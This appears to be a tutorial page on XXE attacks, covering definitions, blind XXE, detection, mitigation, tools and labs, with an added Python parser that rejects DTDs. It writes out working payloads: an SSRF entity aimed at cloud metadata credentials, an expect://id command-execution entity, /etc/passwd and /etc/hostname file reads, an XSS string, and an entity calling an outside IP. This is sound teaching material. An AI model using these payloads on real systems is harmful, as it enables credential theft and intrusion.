
External XML Entity (XXE)


Last updated 2 years ago


Content

  • 📚 What Is XXE?
  • 🤔 Why XXE Happen?
  • 🧬 XXE Types
  • ⚔ Impact
  • 🔎 How To Find
  • ⚙ Mitigation
  • 🛠 Tools
  • 📕 Reference
  • 🔬 Labs

📚 What Is XXE?

What is XML?

XML stands for "Extensible Markup Language". It is the most common language for storing and transporting data, and it is self-descriptive: it has no predefined tags like <p>, <img>, etc. All tags are user-defined according to the data they represent, for example <email></email>, <message></message>, etc.

Definition of XXE:

An XML External Entity attack is an attack against an application that parses XML input and allows (external) XML entities. An XML entity can be used to tell the XML parser to fetch specific content on the server, such as a local file or an internal URL.

What is the Document Type Definition (DTD)?

The DTD describes the structure of the document: it contains element and attribute declarations. An element declaration defines the allowable set of elements that may be used within the document, and an attribute declaration defines the allowable set of attributes for each element. Entity declarations, which XXE abuses, also live in the DTD.

Syntax:

<!DOCTYPE element DTD identifier
[
 declaration1
 declaration2
 ........
]>

🤔 Why XXE Happen?

Some applications use the XML format to transmit data between the browser and the server. Applications that do this virtually always use a standard library or platform API to process the XML data on the server. XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.


🧬 XXE Types

  1. Basic XXE

  2. Blind XXE

Blind XXE

Blind XXE vulnerabilities arise where the application is vulnerable to XXE injection but does not return the values of any defined external entities within its responses. This means that direct retrieval of server-side files is not possible, and so blind XXE is generally harder to exploit than regular XXE vulnerabilities.

There are two broad ways in which you can find and exploit blind XXE vulnerabilities:

  • You can trigger out-of-band network interactions, sometimes exfiltrating sensitive data within the interaction data.

  • You can trigger XML parsing errors in such a way that the error messages contain sensitive data.


⚔ Impact

XML External Entity (XXE) can pose a severe threat to a company or a web developer. XXE has always been on the OWASP Top 10 list. Many websites use XML for storing and transporting data, and if countermeasures are not taken this information can be compromised. The attacks that are possible include:

  • Server-Side Request Forgery (SSRF)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
  • Remote Code Execution (RCE)

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" >]>
<stockCheck><productId>&xxe;</productId></stockCheck>

  • Read Files

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
  • Cross-Site Scripting (XSS)

<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>

Here you can find an example of the same request sent first as JSON and then converted to XML so that an external entity can be injected:

Content-Type: application/json;charset=UTF-8

{"root": {"root": {
  "firstName": "Avinash",
  "lastName": "",
  "country": "United States",
  "city": "ddd",
  "postalCode": "ddd"
}}}
Content-Type: application/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]> 
<root>
 <root>
  <firstName>&xxe;</firstName>
  <lastName/>
  <country>United States</country>
  <city>ddd</city>
  <postalCode>ddd</postalCode>
 </root>
</root>

File Upload

XXE can also be performed through file upload. We will demonstrate this using the PortSwigger lab "Exploiting XXE via Image Upload". The payload we will use is:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE reset [
<!ENTITY xxe SYSTEM "file:///etc/hostname"> ] >
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
    <text font-size="40" x="0" y="100">
        &xxe;
    </text>
</svg>

Understanding the payload: we make an SVG file because the upload area accepts only image files. The basic syntax of the SVG file is given above, and in it we have added a text field that will

We save the above code as "payload.svg". Then, on PortSwigger, we go to a post, open the comment form, and upload the payload in the avatar field.


🔎 How To Find

Look for any request whose body is parsed as XML (or JSON that can be converted to XML) and try to inject an external entity.


⚙ Mitigation

The best way to avoid XXE vulnerabilities is to:

  • Disable document type definitions (DTDs) in your XML parser altogether.

  • If this is impossible, you must disable external entities and document type declarations for your parser.

  • Disable support for XInclude.
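As an added example (not code from the original post), the function below applies the first two mitigations above with Python's standard-library expat parser: it refuses any DOCTYPE, and keeps a second handler that refuses external entity resolution should DTDs ever be re-enabled. The two sample documents are constructed for this example; one reuses the /etc/passwd payload shown under Impact.

```python
import xml.parsers.expat

class XXEBlocked(Exception):
    """Raised when a document tries to use a DTD or an external entity."""

# Constructed samples: a benign stock check and the /etc/passwd payload shown above.
BENIGN = b'<?xml version="1.0"?><stockCheck><productId>381</productId></stockCheck>'
XXE_FILE = (b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b'<stockCheck><productId>&xxe;</productId></stockCheck>')

def parse_untrusted(xml_bytes: bytes) -> dict:
    """Return {element: text} for a flat document, or raise XXEBlocked."""
    parser = xml.parsers.expat.ParserCreate()
    result, stack = {}, []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Layer 1: entities can only be declared inside a DTD, so refusing
        # every DOCTYPE (the first mitigation above) leaves nothing to abuse.
        raise XXEBlocked(f"DOCTYPE {name!r} rejected: DTDs are disabled")

    def external_entity(context, base, system_id, public_id):
        # Layer 2: even if DTDs were re-enabled, never fetch a SYSTEM resource
        # such as file:///etc/passwd or an internal metadata URL.
        raise XXEBlocked(f"external entity {system_id!r} rejected")

    def start_element(name, attrs):
        stack.append(name)
        result.setdefault(name, "")

    def char_data(data):
        if stack:
            result[stack[-1]] += data

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity
    parser.StartElementHandler = start_element
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = char_data
    parser.Parse(xml_bytes, True)  # an undeclared &xxe; without a DTD is an ExpatError
    return result

def is_blocked(xml_bytes: bytes) -> bool:
    """True when parse_untrusted refuses the document on XXE grounds."""
    try:
        parse_untrusted(xml_bytes)
    except XXEBlocked:
        return True
    return False
```

Because the DOCTYPE is rejected before the internal subset is read, the file:///etc/passwd entity is never declared, let alone resolved.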


🛠 Tools

To avoid wasting time, you can read more about XML entities HERE.

Content-Type: from JSON to XXE. To change the request's content type you can use a Burp extension named Content Type Converter.

  • xxeftp - A mini webserver with FTP support for XXE payloads

  • xxexploiter - Tool to help exploit XXE vulnerabilities

  • 230-OOB - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via http://xxe.sh/

  • XXEinjector - Tool for automatic exploitation of XXE vulnerability using direct and different out-of-band methods

  • oxml_xxe - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)

  • docem - Utility to embed XXE and XSS payloads in docx, odt, pptx, etc.

  • otori - Toolbox intended to allow useful exploitation of XXE vulnerabilities.

📕 Reference

  • OWASP
  • PayloadsAllTheThings
  • hacktricks
  • hackingarticles
  • acunetix
  • Portswigger
  • Portswigger-Xml-Entities
  • Portswigger-Blind
  • XXE_Attack_Guide

🔬 Labs

Portswigger Labs solution is Here.

OWASP Broken Web Applications Project: install this machine and you will have a lot of labs like DVWA, bWAPP, WebGoat, etc.